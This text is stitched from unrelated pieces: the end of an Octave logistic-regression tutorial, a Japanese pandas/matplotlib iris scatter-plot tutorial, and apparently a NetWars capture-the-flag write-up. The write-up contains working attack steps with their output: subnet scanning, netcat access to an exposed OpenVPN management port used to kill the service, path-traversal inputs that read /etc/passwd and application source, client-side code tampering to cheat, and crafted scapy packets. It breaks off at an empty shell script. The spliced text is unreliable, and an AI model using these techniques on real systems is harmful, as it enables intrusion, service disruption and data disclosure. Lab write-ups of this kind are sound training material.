function [w,b,dw,db,losses,index]=gradientDescent(w, b, X, Y, numIerations, learningRate)
#Initialize losses and idx
losses=[];
index=[];
# Loop through the number of iterations
for i=1:numIerations,
[loss,dw,db,dZ] = forwardPropagation(w,b,X,Y);
# Perform Gradient descent
w = w - learningRate*dw;
b = b - learningRate*db;
if(mod(i,100) ==0)
# Append index and loss
index = [index i];
losses = [losses loss];
endif
end
end
# Determine the predicted value for dataset
function yPredicted = predict(w,b,X)
m = size(X)(1,2);
yPredicted=zeros(1,m);
# Compute Z
Z = w' * X + b;
# Compute sigmoid
A = sigmoid(Z);
for i=1:size(X)(1,2),
# Set predicted as 1 if A > 0,5
if(A(1,i) >= 0.5)
yPredicted(1,i)=1;
else
yPredicted(1,i)=0;
endif
end
end
# Normalize by dividing each value by the sum of squares
function normalized = normalize(x)
# Compute Frobenius norm. Square the elements, sum rows and then find square root
a = sqrt(sum(x .^ 2,2));
# Perform element wise division
normalized = x ./ a;
end
# Split into train and test sets
function [X_train,y_train,X_test,y_test] = trainTestSplit(dataset,trainPercent)
# Create a random index
ix = randperm(length(dataset));
# Split into training
trainSize = floor(trainPercent/100 * length(dataset));
train=dataset(ix(1:trainSize),:);
# And test
test=dataset(ix(trainSize+1:length(dataset)),:);
X_train = train(:,1:30);
y_train = train(:,31);
X_test = test(:,1:30);
y_test = test(:,31);
end
cancer=csvread("cancer.csv");
[X_train,y_train,X_test,y_test] = trainTestSplit(cancer,75);
w=zeros(size(X_train)(1,2),1);
b=0;
X_train1=normalize(X_train);
X_train2=X_train1';
y_train1=y_train';
[w1,b1,dw,db,losses,idx]=gradientDescent(w, b, X_train2, y_train1, numIerations=3000, learningRate=0.75);
# Normalize X_test
X_test1=normalize(X_test);
#Transpose X_train so that we have a matrix as (features, numSamples)
X_test2=X_test1';
y_test1=y_test';
# Use the values of the weights generated from Gradient Descent
yPredictionTest = predict(w1, b1, X_test2);
yPredictionTrain = predict(w1, b1, X_train2);
trainAccuracy=100-mean(abs(yPredictionTrain - y_train1))*100
testAccuracy=100- mean(abs(yPredictionTest - y_test1))*100
trainAccuracy = 90.845
testAccuracy = 89.510
graphics_toolkit('gnuplot')
plot(idx,losses);
title ('Gradient descent- Cost vs No of iterations');
xlabel ("No of iterations");
ylabel ("Cost");
Conclusion
This post starts with a simple 2 layer Neural Network implementation of Logistic Regression. Clearly the performance of this simple Neural Network is comparatively poor to the highly optimized sklearn’s Logistic Regression. This is because the above neural network did not have any hidden layers. Deep Learning & Neural Networks achieve extraordinary performance because of the presence of deep hidden layers
The Deep Learning journey has begun… Don’t miss the bus!
Stay tuned for more interesting posts in Deep Learning!!
References
1. Deep Learning Specialization
2. Neural Networks for Machine Learning
3. Deep Learning, Ian Goodfellow, Yoshua Bengio and Aaron Courville
4. Neural Networks: The mechanics of backpropagation
5. Machine Learning
Also see
1. My book ‘Practical Machine Learning with R and Python’ on Amazon
2. Simplifying Machine Learning: Bias, Variance, regularization and odd facts – Part 4
3. The 3rd paperback & kindle editions of my books on Cricket, now on Amazon
4. Practical Machine Learning with R and Python – Part 4
5. Introducing QCSimulator: A 5-qubit quantum computing simulator in R
6. A Bluemix recipe with MongoDB and Node.js
7. My travels through the realms of Data Science, Machine Learning, Deep Learning and (AI)
To see all posts check Index of posts
|
Pandasというライブラリとmatplotlibというライブラリでアヤメのデータを散布図にして視覚的にデータの散らばりがわかるようにしたよ。
散布図にすると直感的だよね。
機械学習プログラミングをするまでには、データを理解する必要がありました。データ分析をして、そのうえで、データを機械学習で処理するか否かを決める前判断が必要となります。今回は、Pandasというデータを扱うPythonのライブラリを利用し、散布図というものを作成してみました。
アヤメのデータを利用します。アヤメデータに関する概要はこちらの記事をご参照ください。
こんな人の役に立つかも
・機械学習プログラミングを勉強している人
・アヤメデータの散布図を描きたい人
・Pythonで機械学習プログラミングを勉強している人
散布図でデータを確認
散布図は、データがどれくらい散らばっているかを確認するためのグラフです。
今回は、下のような散布図を作成します。赤色が「setosa」、青色が「versicolor」、緑色が「virginica」とそれぞれのアヤメの種類を表しています。↓の図では「sepal width」と「sepal length」の長さでデータをプロット(データの点を打つこと)しています。
散布図にすると、どんなふうにデータが散らばっているかわかりやすい。
見やすいでしょ
散布図を描くためにプログラミングをする
Pandasとmatplotlibというライブラリを使えるように
Pandasは、Pythonのデータをエクセルの表のように扱える便利なライブラリです。PandasのDataFrameという変数にデータを入れることで、エクセルみたいにデータが扱えます。(が、結構慣れが必要です。)
matplotlibは、PandasのDataFrameのデータから、今回は散布図を描いてくれる便利なライブラリです。使い方はほぼ定型文です。
from sklearn.datasets import load_iris
import matplotlib.pyplot as plt
import pandas as pd
Pythonプログラムの最初にimportし、asとつけることでこれ以降のプログラムでPandasはpdと省略して記載、matplotlibはpltと省略して記載ができます。pltとかpdは好きな名前つけられますが、みんなplt、pdとしています。
変数にアヤメのデータを入れる
panda_box = load_iris()
前回と同じように変数にアヤメのデータを入れます。
アヤメの種類毎にデータを分ける
scikit-learnのアヤメのデータは、50番目まで「setosa」、51番目~100番目が「versicolor」、101番目~最後までが「virginica」という順番なので、50個づつのデータに分割します。このときに、50個づつPandasのDataFrameというデータの形にしています。
iris_dataframe1 = pd.DataFrame(panda_box.data[:50])
iris_dataframe2 = pd.DataFrame(panda_box.data[50:100])
iris_dataframe3 = pd.DataFrame(panda_box.data[100:150])
matplotlibで散布図を作成
plt.scatterで散布図を作成することができます。
今回は、iris_dataframe1[0]とiris_dataframe[1]というように、「sepal length」と「sepal width」の列の散布図を作成しています。
plt.scatter(iris_dataframe1[0], iris_dataframe1[1], c="red")
plt.scatter(iris_dataframe2[0], iris_dataframe2[1], c="blue")
plt.scatter(iris_dataframe3[0], iris_dataframe3[1], c="green")
#以下で散布図の見た目の設定をしています。
plt.title('sepal length vs width')
plt.xlabel('sepal length (cm)')
plt.ylabel('sepal width (cm)')
plt.grid(True)
このプログラムを実行すると、最初の散布図が表示されます。
プログラム全体
先ほどの手順のプログラム全体です。以下をJupyterNotebookに貼り付けても動作します。(グラフの描画に数秒かかるかも)
#必要なPythonライブラリのimport
from sklearn.datasets import load_iris
import matplotlib.pyplot as plt
import pandas as pd
#変数にアヤメのデータを入れる
panda_box = load_iris()
#アヤメのデータをアヤメの種類毎に分ける
iris_dataframe1 = pd.DataFrame(panda_box.data[:50])
iris_dataframe2 = pd.DataFrame(panda_box.data[50:100])
iris_dataframe3 = pd.DataFrame(panda_box.data[100:150])
#matplotlibで散布図を描く
plt.scatter(iris_dataframe1[0], iris_dataframe1[1], c="red")
plt.scatter(iris_dataframe2[0], iris_dataframe2[1], c="blue")
plt.scatter(iris_dataframe3[0], iris_dataframe3[1], c="green")
#以下で散布図の見た目の設定をしています。
plt.title('sepal length vs width')
plt.xlabel('sepal length (cm)')
plt.ylabel('sepal width (cm)')
plt.grid(True)
このプログラムは、「sepal length」と「sepal width」を比較しました。見てわかりますが、この散布図だと、「setosa」のデータはうまく分離しているように見えますが、それだけですね^^;
こんどは、「petal width」と「petal length」の散布図を描いてみました。
iris_dataframe1の[0]を[2]に、[1]を[3]に変更して、列を変えただけです。(iris_dataframe2、iris_dataframe3も同様)
#matplotlibで散布図を描く
plt.scatter(iris_dataframe1[2], iris_dataframe1[3], c="red")
plt.scatter(iris_dataframe2[2], iris_dataframe2[3], c="blue")
plt.scatter(iris_dataframe3[2], iris_dataframe3[3], c="green")
#以下で散布図の見た目の設定をしています。
plt.title('petal length vs width')
plt.xlabel('petal length (cm)')
plt.ylabel('petal width (cm)')
plt.grid(True)
こっちのほうがうまく分離しています。手書きで書いた線みたいなものを算出すれば、データの境界線みたいなものがみつかりそうな雰囲気がありますね。
機械学習の「データあり学習」の「分類」はこのようなうまく分けられる境界線を割り出してくれるんだね。
ということで、縦軸と横軸にとる項目を変化させることでデータのばらつき具合がどのようになっているかを確認することができました。
この縦軸と横軸にとる項目のことを「特徴量」と呼びます。
特徴量の組み合わせは、
①sepal width (vs) sepal length
②sepal width (vs) petal width
③sepal width (vs) petal length
④sepal length (vs) petal width
⑤sepal length (vs) petal length
⑥petal length (vs) petal width
という組み合わせで散布図が作成できますね。これらの特徴量の組み合わせで散布図を描き、どのように分離したらうまく種類が分けられるかを考えればアヤメを種類ごとにうまく分類できるようになることがわかりました。
まとめ:まずは散布図でデータを確認しました
今回は、機械学習の機の字もなく散布図の描画をしました。しかし、少し見えてきたことは、この散布図の上にどのように線を引くか、という線の引き方を機械学習のアルゴリズムがやってくれそうなにおいもしてきました。
この散布図の特徴量の組み合わせすべてを一度に表示できるペアプロットという方法があるらしいので、そのあたりもできたらいいなと思います。
次は、沢山の散布図を同時に確認できるペアプロット という方法を学びました。
|
Snaaake
What two, large words appear first when you exit the game? e.g. Elf Terminal
Quit the game through the UI and then:
______ _____ _| _ \ / __ \ | || | | |_____ __ | / \/ ___ _ __ ___ ___ | | ___| | | / _ \ \ / / | | / _ \| '_ \/ __|/ _ \| |/ _ \| |/ / __/\ V / | \__/\ (_) | | | \__ \ (_) | | __/|___/ \___| \_/ \____/\___/|_| |_|___/\___/|_|\___|NOTE: Disable in production, port 3000Tools:* netcat* openvpn* nmapYour IP is 192.168.64.2
What high-numbered port is open on another host in the same /24 network? e.g. 5000
3000
elf@52aadb50d975:~$ nmap -p- -sC -sV 192.168.64.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-14 18:44 UTC
Nmap scan report for 192.168.64.1
Host is up (0.00037s latency).
PORT STATE SERVICE
3000/tcp open ppp
Nmap scan report for 52aadb50d975 (192.168.64.2)
Host is up (0.00024s latency).
PORT STATE SERVICE
3000/tcp closed ppp
Nmap scan report for 960a1eb2-66db-49ea-9940-d1e5ed6dcdec-1.d4fd3562-d3fe-43ac-9d10-a91e46c3d8c2 (192.168.64.3)
Host is up (0.00021s latency).
PORT STATE SERVICE
3000/tcp open ppp
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.85 seconds
What flag is shown when you disable something outside the Snaaake game?
NetWars{ShutItDown}
elf@52aadb50d975:~$ netcat 192.168.64.3 3000
>INFO:OpenVPN Management Interface Version 1 -- type 'help' for more info
help
Management Interface for OpenVPN 2.4.8 x86_64-alpine-linux-musl [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [MH/PKTINFO] [AEAD] built on Feb 7 2020
Commands:
auth-retry t : Auth failure retry mode (none,interact,nointeract).
bytecount n : Show bytes in/out, update every n secs (0=off).
echo [on|off] [N|all] : Like log, but only show messages in echo buffer.
exit|quit : Close management session.
forget-passwords : Forget passwords entered so far.
help : Print this message.
hold [on|off|release] : Set/show hold flag to on/off state, or
release current hold and start tunnel.
kill cn : Kill the client instance(s) having common name cn.
kill IP:port : Kill the client instance connecting from IP:port.
load-stats : Show global server load stats.
log [on|off] [N|all] : Turn on/off realtime log display
+ show last N lines or 'all' for entire history.
mute [n] : Set log mute level to n, or show level if n is absent.
needok type action : Enter confirmation for NEED-OK request of 'type',
where action = 'ok' or 'cancel'.
needstr type action : Enter confirmation for NEED-STR request of 'type',
where action is reply string.
net : (Windows only) Show network info and routing table.
password type p : Enter password p for a queried OpenVPN password.
remote type [host port] : Override remote directive, type=ACCEPT|MOD|SKIP.
proxy type [host port flags] : Enter dynamic proxy server info.
pid : Show process ID of the current OpenVPN process.
client-auth CID KID : Authenticate client-id/key-id CID/KID (MULTILINE)
client-auth-nt CID KID : Authenticate client-id/key-id CID/KID
client-deny CID KID R [CR] : Deny auth client-id/key-id CID/KID with log reason
text R and optional client reason text CR
client-kill CID [M] : Kill client instance CID with message M (def=RESTART)
env-filter [level] : Set env-var filter level
client-pf CID : Define packet filter for client CID (MULTILINE)
rsa-sig : Enter an RSA signature in response to >RSA_SIGN challenge
Enter signature base64 on subsequent lines followed by END
certificate : Enter a client certificate in response to >NEED-CERT challenge
Enter certificate base64 on subsequent lines followed by END
signal s : Send signal s to daemon,
s = SIGHUP|SIGTERM|SIGUSR1|SIGUSR2.
state [on|off] [N|all] : Like log, but show state history.
status [n] : Show current daemon status info using format #n.
test n : Produce n lines of output for testing/debugging.
username type u : Enter username u for a queried OpenVPN username.
verb [n] : Set log verbosity level to n, or show if n is absent.
version : Show current version number.
END
signal SIGTERM
SUCCESS: signal SIGTERM thrown
elf@52aadb50d975:~$
__ _ __ __ ____ _ _ _____ _ ___ __
/\ \ \___| |_/ / /\ \ \__ _ _ __ ___ / / _\ |__ _ _| |_ \_ \ |_ / \_____ ___ __\ \
/ \/ / _ \ __\ \/ \/ / _` | '__/ __|| |\ \| '_ \| | | | __| / /\/ __| / /\ / _ \ \ /\ / / '_ \| |
/ /\ / __/ |_ \ /\ / (_| | | \__ < < _\ \ | | | |_| | |_/\/ /_ | |_ / /_// (_) \ V V /| | | |> >
\_\ \/ \___|\__| \/ \/ \__,_|_| |___/| |\__/_| |_|\__,_|\__\____/ \__/___,' \___/ \_/\_/ |_| |_| |
\_\ /_/
NetWars{ShutItDown}
SAME
If you type in a bad difficulty level, what is the error type that occurs? (e.g. SparkleTooHighError)
FileNotFoundError
What difficulty level would you like? Options: easy, medium, hard -> super hard
Oops, something went wrong reading the configuration file: FileNotFoundError
[Errno 2] No such file or directory: '/home/same/super hard'
Press ctrl-c to exit
If you load an invalid file using a path traversal, what type of file is it expecting? (e.g. YAML)
JSON
╭─zoey@nomadic ~/netwars
╰─$ nc same.elfu.org 8080
What difficulty level would you like? Options: easy, medium, hard -> ../../etc/passwd
Failed to parse JSON configuration file: <class 'json.decoder.JSONDecodeError'>
Expecting value: line 1 column 1 (char 0)
-- START DEBUG INFORMATION --
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
same:x:1000:1000:,,,:/home/same:/bin/bash
Debian-exim:x:101:101::/var/spool/exim4:/usr/sbin/nologin
-- END DEBUG INFORMATION --
Press ctrl-c to exit
Can you find the full path to the Python script? (e.g. /path/to/file.py)
/home/same/same.py
What is the flag at the top of the Python script? (e.g. NetWars{IHeartChristmas} )
NetWars{you_found_me}
╭─zoey@nomadic /proc/self/cwd
╰─$ nc same.elfu.org 8080
What difficulty level would you like? Options: easy, medium, hard -> ../../proc/self/cmdline
Failed to parse JSON configuration file: <class 'json.decoder.JSONDecodeError'>
Expecting value: line 1 column 1 (char 0)
-- START DEBUG INFORMATION --
python3/home/same/same.py
-- END DEBUG INFORMATION --
Press ctrl-c to exit
╭─zoey@nomadic /proc/self/cwd
╰─$ nc same.elfu.org 8080
What difficulty level would you like? Options: easy, medium, hard -> ../../home/same/same.py
Failed to parse JSON configuration file: <class 'json.decoder.JSONDecodeError'>
Expecting value: line 1 column 1 (char 0)
-- START DEBUG INFORMATION --
#!/usr/bin/env python3
# Flag: NetWars{you_found_me}
import json
import random
import os
Snowball Fight
Win a game of Snowball Fight and submit the flag. (e.g. NetWars{BooYa} )
NetWars{YouSankMyBattlefort}
Win a game of Snowball Fight on Impossible and submit the flag.
You can use chrome to override battlefort.js and look at the websocket network history in dev tools. Change the following source code and it should print out the
forts on the board:
ws.onmessage = function (event) {
// console.log("Incoming ws: " + event.data);
var messageIn = JSON.parse(event.data);
messageIn.Verify =
"gLtBovwCiHRjhMyop4ixz4ZrY7OtPjIcFJH4z5/++jfdgLV3uWHeQrpH6G/6D8vevy7bDFQLrHTCFNEfid6TMaxLLfjubszh4YWz5gErH4UlpVMC5CtMKqocvB33/Ofuy9JW98syEJ8DlHxjWHIfgnFib+tSbB6Mn3lS2aJs3ecS7X9DcdRBIz5PiuVv8XFLsYxYawNN2/IlSpez3TQq9pitBnfK2OftKy9aQvRVaElxYm/rUmwejJ95UtmibN3nzUhgVN+wSzmAGlhhbU1oobGMWGsDTdvyJUqXs900KvatvHia9fQXrL6BZ2J55TShNmf+fu4R02nzzbTKtgFXI0CS8HrrvB6esG/Uvl8IjY7ECriW/24zy4HqV2SZ5VJz7wh8tgE66H1JGiXbhzVDmxfpDBThRiYLTanqPJxw0Rws3nBVCoE40KiHRjiKOOivKmoUgl+BFH114fWj77UeVQXBywXdmWNPGVMJWeL2KqmX/K3sHDWzMkWORecGv5NIdtTot0OsFopJD4u/3YhSVKvAxr7ydRI/+kDPPD8957yiqXhFtZJU1L+TfFZQDyLvzeMV9WpktxeIwpTdgbyaioVxIZ3SlBKPhx4FSXtepu9TS858j2MkGY+2p1FWc6dCtDLvS+20sYhygmIUG/TQN9ynBU/lNdQGkNKxPp5nX5Cx/91Hb3qtWtvuOUqtkb2v24wI31q87S8WKaoWy93l5tBKjkfv6njkUCPpqPWYmpdb0tWU2D7KbirHuU5h8VzvrmIRDvgv8jnf+WbsajMcvdW0z/QVH9UoOxE8TvajTkbjqaJD7AnI8I7x4++jDFtqhQTvi09iGjTvS8JMHSvDAz/pLd1j6VHfaGGpyy5VI6lIhhilpqOKcFQBGNzfIj153A9370YX9rSTrM8UhRVyafrd1WjoSz8hO3P+Nd2uJEzdhps6dVQeA0FkUcNoJphNES0Ztlx7H1m1fkSRlDRR9Z3YmIapTTBo6eNsVCFWPLbfE3VTXArv2lpN7CpY/YMCyYtSZtjcFSz3AFQsMPFHr2Y5JcM3G4Ewfw8MRlzjGNLcD3fvRhf2tJOszxSFFXJp3YC1d7lh3kK6R+hv+g/L3rbTlTGyoCuyVQpaljvMl1okejtWRmico9wuLYDp7UrGhtvhE6sbmaEm4w59ltMnHUjY4tWdmqcMTS6fx5PzOWIlCWbOnd1qVf26HdnHJyADFgg2N7OjlShcv92EEVYdVfc6YZ54r5Lkt51w7nIyQUWWI1FxYy8eXcpEYURvHqIFojRyV9E6IeLn720WCSjcHoanGqGdpHnYWAGDSDs9T/YgLJiUNHMyhGCL9L+ImIiwWvRejDJIRdIwK9h27OHioSsXoGKat2ELWTootQhmUUg=";
if (messageIn.Type == "SALUTE") {
document.getElementById("statusVerify").value = messageIn.Verify;
for (y = 0; y < messageIn.Status["FriendlyLayout"].length; y++) {
for (x = 0; x < messageIn.Status["FriendlyLayout"][y].length; x++) {
if (messageIn.Status["FriendlyLayout"][y][x] == 1) {
document.getElementById("1," + x + "," + y).classList.add("fort");
}
}
}
document.getElementById("statusVerify").value = messageIn.Verify;
for (y = 0; y < messageIn.Status["EnemyLayout"].length; y++) {
for (x = 0; x < messageIn.Status["EnemyLayout"][y].length; x++) {
if (messageIn.Status["EnemyLayout"][y][x] == 1) {
document.getElementById("0," + x + "," + y).classList.add("fort");
}
}
}
}
Click the forts and you end up with a message:
You win!
You won on impossible! NetWars{YouMustBePeeking
Defeat the Enemy with one shot and submit the flag.
Enemy is very literal here and refers to the actual text on the board which is right above 0,0. So lets entire 0, -1 in and we get the following message
in the console:
NetWars{ThatsOneWayToWin}
Play pawng
Complete the Pawng Scapy Trainer. What’s your certificate ID number?
47150284637509565 – Just go through the training to get it. Look at the scapy docs.
Find the (Get Help) Instruction ID from sending a Scapy packet
The packet is described in broken_controller.py, run tail -F /var/log/pawng.log, and use the python to send the packet
2196517487091929
elfadmin@7fbaa7f9eae5:~$ python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from scapy.all import *
>>> sr1(IP(dst="127.0.0.1")/UDP(dport=20,sport=5000))
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x0 len=1536 id=1 flags= frag=0 ttl=64 proto=udp chksum=0x76ea src=127.0.0.1 dst=127.0.0.1 |<UDP sport=20 dport=5000 len=1516 chksum=0x5581 |<Raw load='\xe2\x94\x8d\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x
80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x9
4\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2
\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x91\
n\xe2\x94\x82 ARCADE PAWNG HELP: \xe2\x94\x82\n\xe2\x94\x95\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2
\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\
xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x
80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x99\n1. Get This Help Menu:\n Send a UDP packet to any 127.0.0.1 w/ a dst UDP port of 20\n
and src UDP port of 5000.\n2. Move Paddle Up:\n Send a TCP packet w/ IP dst="127.0.20.180", TCP dport=20, \n TCP flags="PA", and a TCP raw paylod of load="up".\n3. Move Paddle Down:\n Send an ICMP echo reply w/ IP dst="127.80
.1.46", and a \n ICMP raw paylod of load="down".\n4. Change Computer Opponent\'s Difficulty:\n Send a DNS query response to UDP port 53 with a source \n port of 6000 to any 127.0.0.1 with a DNS qr=1, DNSQR \n qname="difficult
y.local", and the DNSRR \n rrname="difficulty.local" and the DNSRR rdata="100".\nNote: The 100 in rdata="100", specifies difficulty from 0-100.\nNote: Packet protocol details NOT specified above dont matter.\nNote: Results of actions
1-4 are logged to /var/log/pawng.log.\nNote: The first to score 10 points wins. \n\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x8
0\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94
\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\
x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\n' |>>>
>>>
KeyboardInterrupt
>>>
KeyboardInterrupt
>>>
elfadmin@7fbaa7f9eae5:~$ cat /var/log/pawng.log
(Get Help) Instruction ID 2196517487091929 Executed
(Get Help) Instruction ID 2196517487091929 Executed
1. Get This Help Menu:
Send a UDP packet to any 127.0.0.1 w/ a dst UDP port of 20
and src UDP port of 5000.
2. Move Paddle Up:
Send a TCP packet w/ IP dst="127.0.20.180", TCP dport=20,
TCP flags="PA", and a TCP raw paylod of load="up".
3. Move Paddle Down:
Send an ICMP echo reply w/ IP dst="127.80.1.46", and a
ICMP raw paylod of load="down".
4. Change Computer Opponent\'s Difficulty:
Send a DNS query response to UDP port 53 with a source
port of 6000 to any 127.0.0.1 with a DNS qr=1, DNSQR
qname="difficulty.local", and the DNSRR
rrname="difficulty.local" and the DNSRR rdata="100".
Note: The 100 in rdata="100", specifies difficulty from 0-100.
Note: Packet protocol details NOT specified above dont matter.
Note: Results of actions 1-4 are logged to /var/log/pawng.log.
Note: The first to score 10 points wins.
Find the (Move Up) Paddle Instruction ID
9802227387255195
lfadmin@7fbaa7f9eae5:~\$ python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
> > > from scapy.all import\*
> > > sr1(IP(dst="127.0.20.180")/TCP(dport=20,flags="PA")/Raw(load="up"))
> > > Begin emission:
> > > Finished sending 1 packets.
> > > .^C
> > > Received 1 packets, got 0 answers, remaining 1 packets
> > >
> > > elfadmin@7fbaa7f9eae5:~\$ cat /var/log/pawng.log
> > > (Get Help) Instruction ID 2196517487091929 Executed
> > > (Get Help) Instruction ID 2196517487091929 Executed
> > > (Move Up) Paddle Instruction ID 9802227387255195 Executed
> > > (Move Up) Paddle Instruction ID 9802227387255195 Executed
Find the Move Down Instruction
2116779544198846
elfadmin@7fbaa7f9eae5:~$ tail -F /var/log/pawng.log &
[1] 206
elfadmin@7fbaa7f9eae5:~$ (Get Help) Instruction ID 2196517487091929 Executed
(Get Help) Instruction ID 2196517487091929 Executed
(Move Up) Paddle Instruction ID 9802227387255195 Executed
(Move Up) Paddle Instruction ID 9802227387255195 Executed
elfadmin@7fbaa7f9eae5:~\$ python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
> > > from scapy.all import \*
> > > send(IP(dst="127.80.1.46")/ICMP(type="echo-reply")/Raw(load="down"))
> > > .
> > > Sent 1 packets.
> > > (Move Down) Paddle Instruction ID 2116779544198846 Executed
Find the CHange Difficult Instruction ID
8892931792975189
elfadmin@7fbaa7f9eae5:~\$ ./scapy
> > > sr1(IP(dst="127.0.0.1")/UDP(sport=6000, dport=53)/DNS(qr=1,qd=DNSQR(qname="difficulty.local"), an=DNSRR(rrname="difficulty.local", rdata="0")))
> > > Begin emission:
> > > Finished sending 1 packets.
> > > .(Change Difficulty) Instruction ID 8892931792975189 Executed
Win Pawng!
Use the packets above in the source code after copying it into a new file. If you set the difficulty to 0 you’ll just win really quick. The win screen says
Prolific Ping Pawng Pwner
def set_difficulty(GAME_DIFFICULTY="100"):
send(IP(dst="127.0.0.1")/UDP(sport=6000, dport=53)/DNS(qr=1,qd=DNSQR(qname="difficulty.local"), an=DNSRR(rrname="difficulty.local", rdata="0")), iface="lo", verbose=False)
def paddle_up():
send(IP(dst="127.0.20.180")/TCP(dport=20,flags="PA")/Raw(load="up"), iface="lo", verbose=False)
def paddle_down():
send(IP(dst="127.80.1.46")/ICMP(type="echo-reply")/Raw(load="down"), iface="lo", verbose=False)
Elf Invaders
https://www.bram.us/2020/04/08/how-to-enable-http3-in-chrome-firefox-safari/ Enable HTTP3 in firefox
Find the version number of the Cabinet once you see the game. (e.g. 8.675309)
In the source of the main HTML file is
<meta name="description" content="Elf Invaders Version 1.61434327095534551" />
What is the message when you score over 9500? (e.g. That’s over 9500!)
In the hitbox detection function, set player.score = 10000 and then let it resume execution. You eventually make a request to the API that results in a response
with Score Level Over 9000!
Disclosure: I did not complete the challenges below. The following notes are from another player that shared the notes with me.
What’s the date in api.php?
5/1/2019
It looks like there’s an api request with a file. Use the curl version on the elf debug terminal since it has http3 support. Create a script, lfi.sh.
#!/bin/sh
